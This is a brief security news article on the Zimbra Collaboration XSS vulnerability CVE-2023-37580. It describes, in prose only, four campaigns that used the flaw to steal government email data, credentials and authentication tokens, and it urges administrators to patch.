Zimbra XSS vulnerability exploited by hackers to to steal government emails

published: Nov. 16, 2023

Take action: f you are working with Zimbra Collaboration Suite, patch it version to the latest version of the software ASAP. Your users will be attacked via phishing emails, and there are so many users that some will definitely be scammed.

Learn More

Google Threat Analysis Group (TAG) is reporting thata XSS vulnerability  the Zimbra Collaboration email software is being exploited by four distinct threat actors to steal email data, user credentials, and authentication tokens from government entities. Most of these attacks occurred subsequent to the public disclosure of the patch for the vulnerability.

Zimbra Collaboration suite is often used by government entities worldwide, and has been previously attacked using a similar XSS vulnerability.

This vulnerability, tracked as CVE-2023-37580 (CVSS score 6.1) is a reflected cross-site scripting (XSS) issue, in the Zimbra Classic Web Client and affects Zimbra Collaboration (ZCS) 8 prior to version 8.8.15 Patch 41. Zimbra addressed this vulnerability, CVE-2023-37580, in July 2023.

Of the observed hacking campaigns, three of them exploited the vulnerability before the official patch was available, while the fourth initiated its campaign a month after the patches were published:

  1. The first campaign targeted a government organization in Greece, where threat actors sent emails containing exploit URLs to their targets. Clicking on the link during a logged-in Zimbra session would load a framework that enabled attackers to exploit the XSS issue to steal users' email data, including emails and attachments, and establish an auto-forwarding rule to redirect incoming messages to an attacker-controlled email address.
  2. A second threat actor began exploiting the vulnerability on July 11, before the official patch was released on July 25. These attackers focused on government organizations in Moldova and Tunisia, with each URL containing a unique official email address specific to organizations in those governments.
  3. A third, unidentified group exploited the vulnerability to steal credentials from a government organization in Vietnam. In this instance, the exploit URL directed users to a script displaying a phishing page to collect webmail credentials and post stolen credentials to a URL hosted on an official government domain that the attackers likely compromised.
  4. The fourth campaign, observed in August 2023, involved threat actors exploiting the vulnerability in an attack against a government organization in Pakistan, with the aim of stealing the Zimbra authentication token.

Zimbra XSS vulnerability exploited by hackers to to steal government emails